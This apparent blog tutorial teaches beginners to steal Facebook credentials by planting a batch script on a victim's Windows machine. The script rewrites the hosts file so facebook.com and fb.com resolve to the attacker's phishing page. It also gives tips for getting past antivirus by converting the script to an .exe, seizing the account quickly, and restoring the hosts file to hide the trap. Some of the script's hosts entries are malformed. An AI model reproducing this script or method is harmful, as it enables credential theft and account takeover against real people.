This tutorial would be a non-exhaustive guide for beginners.If you have not read my previous articles “DNS Hijacking”, “Batch programming” and “Hacking facebook accounts using phishing” then I might ask you to read it before continuing reading this further, since that would give you a prerequisite knowledge upon the topics that we are going to discuss today.
Firstly, I’ll give you the batch program that I was talking about in my last post. As we have seen that, adding an IP address with a corresponding domain name in the host file would redirect you to webpage as you desire with a desired domain name.
So, we are going to take this into next level for hacking purposes. We’ll change the host file in the victim machine with the help of a batch program and redirect the victim to our fake login page. The only thing you need to consider is sending the batch program to the victim machine and running it.
Here is the batch program that can be used to manipulate the HOSTS file.
@echo offReplace the <ip_address> with the IP address of your webpage. You can obtain the IP address of your website by pinging it through Command Prompt (you can refer by previous article of DNS hijacking where I’ve already described). Remember to save this in ‘.bat’ format.
cacls C:\Windows\System32\drivers\etc\hosts /E /P Everyone:F
cd “C:\Windows\System32\drivers\etc”
echo <ip_address>www.facebook.com >> “hosts”
echo <ip_address>www.fb.com >> “hosts”
echo <ip_address>https://www.facebook.com >> “hosts”
echo <ip_address>https://fb.com >> “hosts”
Let us now discuss what exactly the above code does. The second line of the code above takes the admin privileges over the ‘hosts’ file, so that editing can be done. Then we move into the path where the ‘hosts’ file is located and then we write 4 lines into the file. Those lines of codes are responsible for the redirection of the user. Therefore, we try to redirect all the possible combinations of facebook addresses to the IP that is provided.
Remember, executing the above code containing file in the victim’s machine is your personal concern and hence I’m not describing the methodologies of spreading your code.
Note: You can also change the .bat file into .exe file using batch to exe converter. Click the link to learn how to convert a batch file into an executable. Batch files are generally said to be safe and hence there will be no problem with the antivirus programs.
In one of my previous article 10 steps to hack facebook accounts, I’ve already described about creating a fake page and hosting it, you can follow that article from here onwards to make your own.
Now, once the code has been landed and executed in the victim’s machine he will be redirected to your fake page every time he tries to access facebook. Since the address in the address bar of the fake page remains as ‘www.facebook.com’ there is no chance of identification and hence the victim can be trapped easily.
After the user has entered the credentials the data is written into your ‘passwords.txt’ file and further redirected as mentioned in your ‘login.php’ file. At this moment the victim might come to know that he has been trapped since he was not redirected to the facebook home page and may try to change the password. Hence, you have to stay alert while you trap the victim, you will have to immediately get control over the victim’s account once you receive the password.
Further, you must take care of replacing the old hosts file with the new one without any manipulations so that the victim not get the smell of the trap!
I’ve got a lot of complaints that while trying to host a fake page on 000webhost.com their web hosting accounts are being blocked. Therefore in my next tutorial I’ll show you how to host your web page on your own computer. So, look forward and pass your comments!!!
Comments
Post a Comment